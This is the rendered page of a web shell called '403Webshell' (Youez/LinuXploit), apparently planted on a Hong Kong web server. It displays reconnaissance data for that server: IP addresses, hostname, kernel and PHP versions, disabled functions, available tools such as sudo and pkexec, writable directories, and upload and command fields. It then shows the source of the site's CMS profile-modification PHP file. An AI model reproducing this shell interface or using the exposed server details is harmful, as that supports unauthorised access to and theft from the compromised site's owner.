403Webshell
Server IP : 210.245.233.93  /  Your IP : 216.73.216.226
Web Server : Apache/2.2.15 (CentOS)
System : Linux webserver2.onesolution.com.hk 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/hkosl.com/littleark/webadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/hkosl.com/littleark/webadmin/user_profile_modify.php
<?php
$page_settings = array(
    'formid'     => 'Upf_UserProfile', // for permission
    'section'    => 'User', // parent/page title
    'subsection' => 'Profile', // page title
    'domain'     => 'user_profile', // table/model name
    'access'     => 'GNr', // for permission
);

require_once "check_login.php";
require_once 'function_auth.php';

// TODO: require to verify by existing password
$user = SysCmsLogin::where('cmsloginid', '=', (int) $_SESSION["cmsloginid"])->first();

$message = "";
if (empty($_POST["username"])) {
    $message .= _lang("Please enter User Name.") . "\\n\\n";
}

// if (empty($_POST["loginname"])) {
//     $message .= _lang("Please enter Login Name.") . "\\n\\n";
// }

if (strlen($_POST["loginpw_new"]) && ($_POST["loginpw_new"] != $_POST["loginpw_confirm"])) {
    $message .= _lang("Please verify the password.") . "\\n\\n";
}

if ($user->cmsloginpw !== Password::hash($_POST['loginpw'])) {
    $message .= _lang("Please verify the password.") . "\\n\\n";
}

if (!empty($message)) {
    echo "<script>alert('" . $message . "'); history.back();</script>";
    exit;
}

// vdump(Password::hash($_POST['loginpw']), $valid);
// exit;

$user->fill([
    'cmsusername' => $_POST['username'],
]);

if (strlen($_POST["loginpw_new"]) > 0) {
    $strength = Password::strength($_POST["loginpw_new"], $_POST["username"]);
    if (!$strength) {
        exit(_lang('Insufficient password strength'));
    }
    $user->cmsloginpw = Password::hash($_POST["loginpw_new"]);
}

$user->save();
// dq(1,1);

header("Location: {$page_settings['domain']}_modifyform.php?msg=2");
exit;

Youez - 2016 - github.com/yon3zu
LinuXploit